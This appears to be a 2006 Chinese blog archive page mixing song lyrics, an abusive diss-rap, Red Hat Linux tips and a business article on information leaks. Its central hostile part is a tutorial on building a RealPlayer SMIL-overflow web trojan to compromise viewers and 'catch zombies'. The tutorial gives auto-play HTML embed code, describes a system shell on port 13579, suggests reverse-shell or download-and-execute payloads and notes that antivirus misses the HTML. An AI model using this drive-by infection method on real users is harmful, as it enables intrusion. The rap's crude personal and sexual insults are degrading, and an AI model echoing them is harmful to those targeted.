分类 : 娱乐休闲 | 发表时间 16-03-2006
河南人民广播电台音乐广播
分类 : 娱乐休闲 | 发表时间 16-03-2006
河南人民广播电台戏曲广播在线直播
分类 : 网络日志 | 发表时间 16-03-2006
河南人民广播电台交通广播网上直播
翻开随身携带的记事本
写着许多事都是关于你
你讨厌被冷落
习惯被守候
寂寞才找我
我看见自己写下的心情
把自己放在卑微的后头
等你等太久
想你泪会流
而幸福快乐是什么
爱的痛了
痛的哭了
哭的累了
日记本里页页执着
记载着你的好
像上瘾的毒药
它反复骗着我
爱的痛了
痛的哭了
哭的累了
矛盾心里总是强求
劝自己要放手
闭上眼让你走
烧掉日记重新来过
我看见自己写下的心情
把自己放在卑微的后头
等你等太久
想你泪会流
而幸福快乐是什么
爱的痛了
痛的哭了
哭的累了
日记本里页页执着
记载着你的好
像上瘾的毒药
它反复骗着我
爱的痛了
痛的哭了
哭的累了
矛盾心里总是强求
劝自己要放手
闭上眼让你走
烧掉日记重新来过
爱的痛了
痛的哭了
哭的累了
矛盾心里总是强求
劝自己要放手
闭上眼让你走
重新来过
哎呀 老虎不发威 你拿我当HOLLE KITTY是不是?
小驴不说话你拿我当SHOOP啊?
十元人民币作者 小驴-TOMMY 演唱者 小驴-TOMMY
天晴了 雨停了 你又觉得你行了
人间大道你说你怎么咋就不去走呢?
五员人民币就是说你这种没实力
拿着别人的作品硬说是自己的创意
别再欺骗自己 那不是你的实力
也许你自己的无能使你这么没有自信
只会偷别人的抄袭 那没有任何意义
真正的作者在这里 你不用那么神秘
你从小缺盖 长大缺爱 腰系麻绳 头顶锅盖
还说你是中国说唱界的东方不败
你长的挺有创意 活得挺有勇气
丑不是你的本意 是上帝发的脾气
你活着浪费空气 死了浪费土地
掘B的浪费人民币
如果没有你的存在怎么能衬托世界的美丽
如果没有你的存在怎么能衬托LM的美丽
你靠山山倒 靠河河干 看鸡鸡死 看狗狗翻
还要杨起HIP-HOP的一片风帆
你还整个你的名字叫做旷云 你不如叫做矿井
你妈叫做旷课 你爸叫做矿工
你还起名叫做 云上舞 你不如叫过街老鼠
我写啥 你抄啥 你还真是有点土
你语言没有杀伤力 拿着5个大硬币
看场三毛流浪记 一天活得还挺满意
没事喝着小酒 然后迈着犬步
梳着伤心的发型 走在乡间的小路
还硬说你那个让人踢碎的嗓子唱歌像TM阿杜
(这小子那天在网吧上网 然后给人发视平
人家网管告诉他防火墙不同发不了
他还一下跟人网管急了 哪个是防火墙 防火墙在哪呢
我要给它扒了 我要看人
你这个老顿迷糊 那个嘴笨的跟棉裤裆似的
还天天在那汪汪汪汪汪汪汪还这RAP 那RAP的)
还有一个三级模特 自以为很挺独特
身上的避孕工具更不只一个两个
她需要让人养着 不需要让人管着
她嫉妒心随着 春季之们常开着
她打扮比鬼难看 一打扮鬼都瘫痪
你说你该怎么办
你说身高是你的优势 丰满是你的标志
为啥一说话就像是孩子弱了智
你说有钱人就是机智 没钱人就是幼稚
那我的钱和你比 你简直就是精致
你还在那跟我在这吹你奶奶个哨子
-她家那穷的
交通基本靠走 通信基本靠吼
取暖基本靠抖 治安基本靠狗
你说你还怎么说的出口
真是在大众面前献丑(献丑)
你头上插个鸡毛掸子 没事包个狗皮毯子
近看像个铅笔杆子 远看像个铁皮铲子
HEY What s Girl
真的有句话想对你说 你想知道吗?
那我就告诉你 你XX 狗XX
(你说你家穷那个样 你说你拿个小灵通 你站在风雨中
左手换右手 你还右手打不通 耗子去你家都含眼泪走的
这样你还说你男朋友长的帅 有钱 长的是有前
长的跟前列腺似的 尿尿都分岔了 赶紧给治治吧
还白呼啥呀)
还有人天天在那告诉我什么才是真正的嘻哈
问我听了他那个散尿的音乐到底哈不哈
什么刀枪棍棒斧岳钩* 烧饼油条包子麻花
我看你就像一个纯种荷兰傻瓜
YO !·#¥%……—*()——~#%¥……%%…………—*
–说的啥啊
–我也不知道
听不惯的 有意见的 都闭上你的嘴
让我发现了那就是给你们一顿堆
HIP-HOP不是COOL 它是一种态度
为啥你们总三翻五次的老犯错误
炫耀过度 还是你根本没穿内裤
为啥总感觉你没走寻常路呢
上有天 下有地 中间有空气
歌里有了你们的参与那才算是有了完整意义
这回给你们点脸 希望你们长点记性
别以为这样很不公平
其实是你们真的不行
大萝卜坐飞机你在那给冒充进口大苹果呢
老强调自己有智商 这回真的让我给治伤了是不是?
写这点玩意给我累坏了 两管笔都写没油了
–TOMMY哥在最后再整两句
整两句 整啥呢 拉倒吧 就这么结素吧
老整两句多俗啊 就这样挺好的 行不行?
–那也行
分类 : 系统安全 | 发表时间 06-03-2006
0001
修改主机名
vi /etc/sysconfig/network,修改HOSTNAME一行为HOSTNAME=主机名,重启后也能生效
0002
Ret Hat Linux启动到文字界面(不启动xwindow)
将/etc/inittab中 id:5:initdefault: 一行中的5改为3
0003
redhat的自动升级更新问题(hutuworm)
在www.redhat.com/corp/support/errata/找到补丁,6.1以后的版本带有一个工具up2date,它能够测定哪些rpm包需要升级,然后自动从redhat的站点下载并完成安装。
升级除kernel外的rpm: up2date -u
升级包括kernel在内的rpm: up2date -u -f
0004
windows下看linux分区的软件
Paragon.Ext2FS.Anywhere.2.5.rar和explore2fs-1.00-pre4.zip
0005
mount用法(sakulagi)
fat32的分区 mount -o codepage=936,iocharset=cp936 /dev/hda7 /mnt/cdrom
ntfs的分区 mount -o iocharset=cp936 /dev/hda7 /mnt/cdrom
iso文件 mount -o loop /abc.iso /mnt/cdrom
软盘 mount /dev/fd0 /mnt/floppy
USB闪存 mount /dev/sda1 /mnt/cdrom
所有/etc/fstab内容 mount -a
可以指定文件格式”-t 格式”, 格式可以为vfat, ext2, ext3等.
0006
在vmware的LINUX中使用本地硬盘的FAT分区
将本地的FAT分区共享,然后在VMWARE中使用SMBFS挂上。可以将如下的行放到/etc/fstab中:
//win_ip/D$ /mnt/d smbfs defaults,auto,username=win_name,password=win_pass,codepage=936,iocharest=gb2312 0 0
其中win_ip是你的windows的IP地址;
D$是你的windows里面共享的D盘的共享名;
/mnt/d是要将该分区mount到linux的目录;
win_name和win_pass是你的WINDOWS里面可以读取该分区的用户,比如你的管理员名和密码。
如果你运行了/etc/rc.d/init.d/netfs,那么在启动的时候就会自动挂载这个分区。
0007.a
删除名为-a的文件
rm ./-a
rm — -a 告诉rm这是最后一个选项,参见getopt
ls -i 列出inum,然后用find . -inum inum_of_thisfile -exec rm ‘{}’ \;
0007.b
删除名为\a的文件
rm \\a
0007.c
删除名字带的/和‘\0′文件
这些字符是正常文件系统所不允许的字符,但可能在文件名中产生,如unix下的NFS文件系统在Mac系统上使用
1.解决的方法,把NFS文件系统在挂到不过滤’/'字符的系统下删除含特殊文件名的文件。
2.也可,将错误文件名的目录其它文件移走,ls -id 显示含该文件目录的inum,umount 文件系统,
clri清除该目录的inum,fsck,mount,check your lost+found,rename the file in it.
最好是通过WINDOWS FTP过去就可以删除任何文件名的文件了!
0007.d
删除名字带不可见字符的文件
列出文件名并转储到文件:ls -l >aaa
然后编辑文件的内容加入rm命令使其内容成为删除上述文件的格式:
vi aaa
[rm -r *******
]
把文件加上执行权限 chmod +x aaa
执行 $aaa
0007.e
删除文件大小为零的文件
rm -i `find ./ -size 0`
find ./ -size 0 -exec rm {} \;
find ./ -size |xargs rm -f &非常有效
for file in * #自己定义需要删除的文件类型
do
if [ ! -s ${file} ]
then
rm ${file}
echo “rm $file Success!”
fi
done
0008
redhat设置滚轮鼠标(mc1011)
进入X后,选择鼠标的配置,选择wheel mouse(ps/2)就可以了,
如果鼠标表现异常,重启计算机即可。
0009
加装xwindow
用linux光盘启动,选择升级,然后单独选择包,安装即可
0010
删除linux分区
做一张partition magic的启动软盘,启动后删除. 或者用win2000的启动光盘启动,然后删除.
0011
如何退出man
q
0012
不编译内核,mount ntfs分区
原装rh8,未升级或编译内核
1. 上google.com搜索并下载 kernel-ntfs-2.4.18-14.i686.rpm
2. rpm -ivh kernel-ntfs-2.4.18-14.i686.rpm
3. mkdir /mnt/c
4. mount -t ntfs /dev/hda1 /mnt/c
0013
redhat 8.0中用xmms听mp3
下载www.gurulabs.com/files/xmms-mp3-1.2.7-13.p.i386.rpm
rpm -Uvh xmms-mp3-1.2.7-13.p.i386.rpm
0014
找回忘记了的root口令(lilo/grub)
三种办法:
1.在系统进入单用户状态,直接用passwd root去更改
2.用安装光盘引导系统,进行linux rescue状态,将原来/分区挂接上来,作法如下:
cd /mnt
mkdir hd
mount -t auto /dev/hdaX(原来/分区所在的分区号) hd
cd hd
chroot ./
passwd root
这样可以搞定
3.将本机的硬盘拿下来,挂到其他的linux系统上,采用的办法与第二种相同
rh8中
一. lilo
1. 在出现 lilo: 提示时键入 linux single
画面显示 lilo: linux single
2. 回车可直接进入linux命令行
3. #vi /etc/shadow
将第一行,即以root开头的一行中root:后和下一个:前的内容删除,
第一行将类似于
root::……
保存
4. #reboot重启,root密码为空
二. grub
1. 在出现grub画面时,用上下键选中你平时启动linux的那一项(别选dos哟),然后按e键
2. 再次用上下键选中你平时启动linux的那一项(类似于kernel /boot/vmlinuz-2.4.18-14 ro root=LABEL=/),然后按e键
3. 修改你现在见到的命令行,加入single,结果如下:
kernel /boot/vmlinuz-2.4.18-14 single ro root=LABEL=/
4. 回车返回,然后按b键启动,即可直接进入linux命令行
5. #vi /etc/shadow
将第一行,即以root开头的一行中root:后和下一个:前的内容删除,
第一行将类似于
root::……
保存
6. #reboot重启,root密码为空
0015
使ctrl + alt + del失效
vi /etc/inittab
将ca::ctrlaltdel:/sbin/shutdown -t3 -r now这行注释掉,就可以了
0016
如何看出redhat的版本是7还是8(hutuworm)
cat /proc/version或者cat /etc/redhat-release或者cat /etc/issue
0017
文件在哪个rpm中(无双)
上www.rpmfind.net上搜,或者rpm -qf 文件名得到
0018
把man或info的信息存为文本文件
以 tcsh 为例:
man tcsh | col -b > tcsh.txt
info tcsh -o tcsh.txt -s
0019
利用现存两个文件,生成一个新的文件
1. 取出两个文件的并集(重复的行只保留一份)
2. 取出两个文件的交集(只留下同时存在于两个文件中的文件)
3. 删除交集,留下其他的行
1. cat file1 file2 | sort | uniq
2. cat file1 file2 | sort | uniq -d
3. cat file1 file2 | sort | uniq -u
0020
设置com1口,让超级终端通过com1口进行登录
确认有/sbin/agetty,编辑/etc/inittab,添加
7:2345:respawn:/sbin/agetty /dev/ttyS0 9600
9600bps是因为联路由器缺省一般都是这种速率,也可以设成
19200、38400、57600、115200
修改/etc/securetty,添加一行:ttyS0,确保root用户能登录
重
分类 : 心情随笔 | 发表时间 04-03-2006
分类 : 技术文摘 | 发表时间 11-01-2006
作者:lcx
ps:本站关于木马得内容仅做为技术研究之用,请勿用于非法用途!
非安全第6期陈莎莎写了篇文章<<通过p2p共享影视文件抓肉鸡>>,里边的抓肉鸡主要思路是在rm影音文件中插入网页木马的url链接,用户看影音文件到某个时段弹出网页木马的url。其实,利用REALPLAYER本身的漏洞,直接做成网页木马,让用户在看rm的时候直接中马是有更好的效果。因为这样一来,此漏洞利用是与IE无关了,而且打REALPLAYER补丁的人少之又少,成功率还是很高的。只要装有REALPLAYER或暴风影音支持smil格式等播放器的用户都会中招。
2005年3月份,REALPLAYER暴出安全漏洞,大体意思是:RealPlayer事一款媒体播放器。使用者可以以基于缓冲区溢出脆弱用协调的多媒体综合语言(smil)文件形式语法分析程序,这能允许一个存心不良的攻击者在一台脆弱的机器上运行任意的代码。受影响系统: Windows RealPlayer 10.5 (6.0.12.1040-1056)、Windows RealPlayer 10 、Windows RealOne Player v2 (6.0.11.853 – 872) 、 Windows RealOne Player v2 (6.0.11.818 – 840) 、Windows RealOne Player v1 、Windows RealPlayer 8 、Windows RealPlayer Enterprise 、Mac RealPlayer 10 (10.0.0.305 – 325) 、Mac RealOne Player 、Linux RealPlayer 10 、Linux Helix Player。从这个漏洞的描述上来看,也会明白这个网页木马的可怕之处。
恶意的smil文件生成器,网上有现成的代码。如图1所示,我用编译好的real.exe生成了1个1.smil文件。
我本机装有暴风影音,打开这个1.smil,如图2所示。此时我本机就会开13579端口。netstat -an来看一下,再telnet本机13579端口试试,成功!如图3、图4所示。注意在图4中执行命令的时候,并没有回显,打完命令运行后才能看到结果的,是系统权限的。
这个漏洞的利用方法大体就是这个样子。我们现在就是利用此漏洞来制做成网页木马,让用户打开网页后就会打开本机的13579端口。其实说白了,也就是如何在网页中调用生成的smil文件。什么是smil文件呢?也就是replayer连续播放影音文件的一种调用方法。举个简单的例子,如果想连续播放两首mp3,网页代码如下:
★
<OBJECT classid=”clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA” WIDTH=”256″ HEIGHT=”64″>
<PARAM NAME=”_ExtentX” VALUE=”9313″>
<PARAM NAME=”_ExtentY” VALUE=”1588″>
<PARAM NAME=”AUTOSTART” VALUE=”-1″>
<PARAM NAME=”SHUFFLE” VALUE=”0″>
<PARAM NAME=”PREFETCH” VALUE=”0″>
<PARAM NAME=”NOLABELS” VALUE=”0″>
<PARAM NAME=”SRC” VALUE=”Real.smil”>
<PARAM NAME=”CONTROLS” VALUE=”ControlPanel,StatusBar”>
<PARAM NAME=”CONSOLE” VALUE=”Clip”>
<PARAM NAME=”LOOP” VALUE=”1″>
<PARAM NAME=”NUMLOOP”>
<PARAM NAME=”CENTER”>
<PARAM NAME=”MAINTAINASPECT” VALUE=”0″>
</OBJECT>
============================请把以上内容保存成htm或html文件
Real.smil文件的内容:
<smil>
<head>
<layout>
<region id=”oRegion” left=”0″ top=”0″ />
</layout>
</head>
<body>
<seq>
<video region=”oReal” src=”001.mp3″ />
<video region=”oReal” src=”002.mp3″ />
</seq>
</body>
</smil>
============================001.mp3和002.mp3(或其它媒体格式)与你保存的htm文件还有Real.smil放在同一目录下
★
根据我以上的代码做完后,你再用网页打开你做好的htm文件就可以在网页中调用一些影音播放器播放001.mp3和002.mp3了。那有了这么多的代码与理论基础了,你会做网页木马了吗?做网页木马就简单多了,怕菜鸟还是不明白,再写一次代码吧:
★
===========REALPLAYER 网页木马代码开始==============================
<OBJECT classid=”clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA” WIDTH=”256″ HEIGHT=”64″>
<PARAM NAME=”_ExtentX” VALUE=”9313″>
<PARAM NAME=”_ExtentY” VALUE=”1588″>
<PARAM NAME=”AUTOSTART” VALUE=”-1″>
<PARAM NAME=”SHUFFLE” VALUE=”0″>
<PARAM NAME=”PREFETCH” VALUE=”0″>
<PARAM NAME=”NOLABELS” VALUE=”0″>
<PARAM NAME=”SRC” VALUE=”你用real.exe生成的恶意smil文件的名字,如1.smil”>
<PARAM NAME=”CONTROLS” VALUE=”ControlPanel,StatusBar”>
<PARAM NAME=”CONSOLE” VALUE=”Clip”>
<PARAM NAME=”LOOP” VALUE=”1″>
<PARAM NAME=”NUMLOOP”>
<PARAM NAME=”CENTER”>
<PARAM NAME=”MAINTAINASPECT” VALUE=”0″>
</OBJECT>
===========REALPLAYER 网页木马代码结束==============================
★
方法就是这样简单,一个htm文件加一个恶意的smil文件就全部结束了。如果你想把网页木马改成反弹端口或下载执行exe的,那就要看你构造恶意的smil文件的shellcode水平了。我这里只是提供了一个思路,至于如何完美打造这个REALPLAYER 网页木马,大家各自研究吧。你也要可以用我的思路,利用非安全6期陈莎莎的那篇文章制作的恶意rm文件改成网页调用的方式,估计也会这功。而且,这都是正常的htm代码,杀毒软件不会去杀这段htm代码的。另外,附个小知识,REALPLAYER的网页参数:
★
一些REAL文件参数:
AUTOSTART 自动播放:true|false 默认:false
CENTER 放在中间位置 true|false 默认:false
CONSOLE 连接多种格式 name, _master, or _unique 默认:无
CONTROLS 播放面板的按钮和MTV、电影窗口 按钮的名字(PlayButton,PlayOnlyButton,StopButton,FFCtrl, RWCtrl,MuteCtrl,VolumeSlider,ImageWindow ) 默认:全部按钮
HEIGHT 高度,单位是百分比或者象素,默认:0
WIDTH 宽度,单位是百分比或者象素,默认:0
LOOP 自动重放 true|false 默认:false
MAINTAINASPECT 预留图象窗口. true|false 默认:false
NOJAVA 防止JVM跳出来. no true|false 默认:false
NOLABELS 不显示播放器的一些信息true|false 默认:false
NOLOGO 不显示Real的LOGO true|false 默认:false //Real很霸道这句我从来没有改成过,你怎么改还是认为是 true
NUMLOOP 指定某段片段的反复播放 any number 默认:无
REGION 绑定SMIL区域. SMIL region 默认:无
SHUFFLE 随机播放某段 true|false 默认:false
SRC 文件连接地址
BACKGROUNDCOLOR 背景颜色:颜色的英文名或者RGB数值 默认:黑色
分类 : 技术文摘 | 发表时间 02-01-2006
信息安全?“不就是安装杀毒软件,在电脑上设设密码吗”?当你这样想,你就和全世界95%的人一样,都错估、低估了信息对公司的致命影响;好在全世界就是有5%的人,和《中国财富》一样,恐惧、震慑、急着应变于信息对商业世界爆炸性的影响力。
小心30个细节,一分钟毁灭你的公司,这是一个以1%、2%决胜负的商业时代,一个信息就可以左右企业的成败。这个信息在自己手里是王牌,在对手手里是炸弹。
如此重要的信息,可能在老板的大脑里、公司电脑里、一个打印稿的背面,甚至在一个垃圾筐里。随时都有泄漏的可能,泄漏的结果轻则使公司蒙受损失,重则毁灭公司。
当你读这篇文章的时候,全世界又有2个企业因为信息安全问题倒闭,有11个企业因为信息安全问题造成大概800多万的直接经济损失。中国财富通过对100个经理人的调查总结30个致命细节,让您5分钟快速成为信息安全专家。
1、 打印机——10秒延迟带来信息漏洞 即使是激光打印机,也有10秒以上的延迟,如果你不在第9秒守在打印机的旁边,第一个看到文件的人可能就不是你了。大部分的现代化公司都使用公用的打印机,并且将打印机、复印机等器材放在一个相对独立的空间里。于是,部门之间的机密文件就可以从设备室开始,在其他部门传播,当部门之间没有秘密,公司也就没有秘密了。
2、 打印纸背面——好习惯换取的大损失 节约用纸是很多公司的好习惯,员工往往会以使用背面打印纸为荣。其实,将拥有这种习惯公司的“废纸”收集在一起,你会发现打印、复印造成的废纸所包含公司机密竟然如此全面,连执行副总都会觉得汗颜,因为废纸记载了公司里比他的工作日记都全面的内容。
3、 电脑易手——新员工真正的入职导师 我们相信,所有的职业经理人都有过这样的经历:如果自己新到一家公司工作,在自己前任的电脑里漫游是了解新公司最好的渠道。在一种近似“窥探”的状态下,公司里曾经发生过的事情“尽收眼底”,从公司以往的客户记录、奖惩制度、甚至你还有幸阅读前任的辞呈。如果是其他部门的电脑,自然也是另有一番乐趣。
4、 共享——做好文件 再通知窃取者 局域网中的共享是获得公司内部机密最后的通道。有的公司为了杜绝内部网络泄密,规定所有人在共享以后一定要马上取消。实际上越是这样,企业通过共享泄露机密的风险越大。因为当人们这样做的时候,会无所顾及地利用共享方式传播信息,人们习惯的方式是在开放式办公间的这边对着另一边的同事喊:“我放在共享里了,你来拿吧——”,没错,会有人去拿的,却往往不只是你期望的人。
5、 指数对比——聪明反被聪明误 在传统的生产型企业之间,经常要推测竞争对手的销售数量、生产数量。于是,人们为了隐藏自己的实际数量,而引入了统计学里的指数,通过对实际数量的加权,保护自己的机密信息。唯一让人遗憾的是,通常采取的简单基期加权,如果被对方了解到几年内任何一个月的真实数量,所有的真实数量就一览无余地出现在竞争对手的办公桌上了。
6、 培训——信息保卫战从此被动 新员工进入公司,大部分的企业会对新员工坦诚相见。从培训的第一天开始,新员工以“更快融入团队”的名义,接触公司除财务以外所有的作业部门,从公司战略到正在采取的战术方法,从公司的核心客户到关键技术。但事实上,总有超过五分之一的员工会在入职三个月以后离开公司。同时,他们中的大部份没有离开现在从事的行业,或许正在向你的竞争对手眉飞色舞地描述你公司的一草一木。
7、 传真机——你总是在半小时后才拿到发给你的传真 总有传真是“没有人领取”的,每周一定有人收不到重要的传真;人们总是“惊奇地”发现,自己传真纸的最后一页是别人的开头,而你的开头却怎么也找不到了。
8、 公用设备——不等于公用信息 在小型公司或者一个独立的部门里,人们经常公用U盘、软盘或手提电脑。如果有机会把U盘借给公司的新会计用,也就有可能在对方归还的时候轻易获得本月的公司损益表。
9、 摄像头——挥手之间断送的竞标机会 总部在上海的一家国内大型广告公司,在2004年3月出现的那一次信息泄露,导致竞标前一天,广告创意被竞争对手窃取,原因竟然是主创人员的OICQ上安装了视频,挥手之间,断送的或许并不仅仅是一次合作的机会。
10、 产品痕迹——靠“痕迹”了解你的未来 在市场调查领域,分析产品痕迹来推断竞争对手行销效果和行销策略是通用的方法。产品的运输、仓储、废弃的包装,都可以在竞争对手购买的调研报告中出现,因为“痕迹分析”已经是商业情报收集的常规手段。
11、 压缩软件——对信息安全威胁最大的软件 ZIP、RAR是威胁企业信息安全最大的软件。3寸软盘的存储空间是1.4M,压缩软件可以让大型的WORD文件轻松存入一张软盘,把各种资料轻松带出公司。
12、 光盘刻录——资料在备份过程中流失 如果想要拿走公司的资料,最好的办法是申请光盘备份,把文件做成特定的格式,交给网络管理员备份,然后声称不能正常打开,要求重新备份,大多情况下,留在光驱里的“废盘”就可以在下班后大大方方带出公司。
13、 邮箱——信息窃取的中转站 利用电子邮件转移窃取的公司资料占所有信息窃取的八成以上。很多企业不装软驱、光驱、USB接口,却没有办法避免员工通过电子邮件的窃取信息,相比之下,以上方法显得有些幼稚、可笑。
14、 隐藏分区——长期窃取公司资料必备手法 长期在公司内搜集资料,用来出售或保留,总是件危险的事情。自己的电脑总是不免被别人使用,发现电脑里有不该有的东西怎么行。于是隐藏在硬盘分区就成了最佳选择,本来有C、D、E三个虚拟分区,可以把E隐藏起来,只有自己可以访问。当然,如果遇到行家,合计一下所有磁盘的总空间,可就一定露馅了。
15、 私人电脑——大量窃取资料常用手段 压缩软件的作用毕竟是有限的,如果把自己的笔记本电脑拿到单位来,连上局域网,只要半小时,就是有1个G的文件也可以轻松带走。
16、 会议记录——被忽视的公司机密 秘书往往把会议记录看得很平常,他们不知道一次高层的会议记录对于竞争对手意味着什么,公司里经常可以看见有人把会议记录当成废纸丢来丢去,任由公司最新的战略信息在企业的任何角落出现。
17、未被采纳的策划案——放弃也是一种选择 策划人员知道被采纳的策划是公司机密,去往往不知道被放弃的策划也是公司机密。有时还会对客户或媒体谈起,而竞争对手可以轻松判断:你没有做这些,就一定选择做了那些!
18、客户——你的机密只是盟友的谈资 经常可以在网络上看到著名咨询公司的客户提案,这些精心制作的PPT,凝聚了咨询公司团队的汗水和无数个不眠之夜,在一些信用较差的客户手里可能只是一些随意传播的谈资。
19、招聘活动
